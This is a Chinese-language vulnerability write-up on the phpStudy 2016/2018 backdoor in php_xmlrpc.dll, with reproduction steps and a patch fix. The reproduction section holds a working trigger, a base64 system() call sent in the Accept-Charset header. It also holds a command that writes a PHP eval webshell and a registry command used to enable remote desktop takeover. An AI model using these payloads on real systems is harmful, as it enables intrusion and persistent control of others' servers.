说明 | 内容 |
---|---|
漏洞编号 | phpstudy_2016-2018_rce |
漏洞名称 | RCE(Remote Command|Code Execute) |
漏洞评级 | 高危 |
影响范围 | phpStudy 2016 phpStudy 2018 |
漏洞描述 | 攻击者可以利用该漏洞执行PHP 命令,也可以称作 phpStudy 后门 。 |
漏洞描述
攻击者可以利用该漏洞执行PHP 命令,也可以称作 phpStudy 后门 。RCE(Remote Command|Code Execute)
Phpstudy软件是国内的一款免费的PHP调试环境的程序集成包,通过集成Apache、PHP、MySQL、phpMyAdmin等多款软件一次性安装,无需配置即可直接安装使用,一键搭建。 其中2016、2018版本的phpstudy存在被黑客恶意篡改后形成的RCE漏洞。该漏洞可以直接远程执行系统命令。
影响版本
后门代码存在于\ext\php_xmlrpc.dll模块中,至少有2个版本: phpStudy2016和phpStudy2018自带的php-5.2.17、php-5.4.45。 其中: phpStudy2016查看:
\phpStudy\php\php-5.2.17\ext\php_xmlrpc.dll
\phpStudy\php\php-5.4.45\ext\php_xmlrpc.dll
phpStudy2018查看
\PHPTutorial\PHP\PHP-5.2.17\ext\php_xmlrpc.dll
\PHPTutorial\PHP\PHP-5.4.45\ext\php_xmlrpc.dll
漏洞复现
基础环境
组件 | 版本 |
---|---|
OS | Windows 7 x64 |
Web Server | phpStudy 2016(特别版) |
漏洞扫描
win7 可以访问server2016
启动purb工具拦截服务器与浏览器之间的流量
将抓到的报文重放
漏洞触发验证
触发条件
Accept-Charset: c3lzdGVtKCd3aG9hbWknKTs=
Accept-Encoding: gzip,deflate
深度利用
第一种方式burp 执行系统命令
phpstudy软件被插入后门,通过php system函数执行系统命令,所以我们也可以通过system()函数写入webshell,
system(' ECHO ^<?php@eval($_POST[cmd]); ?^>>"C:/phpStudy/WWW/demon.php ');
第二种方式 也可以在kali里使用 python脚本 实现远程图形化控制
启用账户
开启3389端口:reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fSingleSessionPerUser /t REG_DWORD /d 0 /f
kali 启动remmina 远程控制对方
修复建议
下载:http://downinfo.myhostadmin.net/phpxmlrpc.rar 解压
复制文件
php\php-5.2.17\ext\php_xmlrpc.dll
php\php-5.4.45\ext\php_xmlrpc.dll
覆盖原路径文件即可。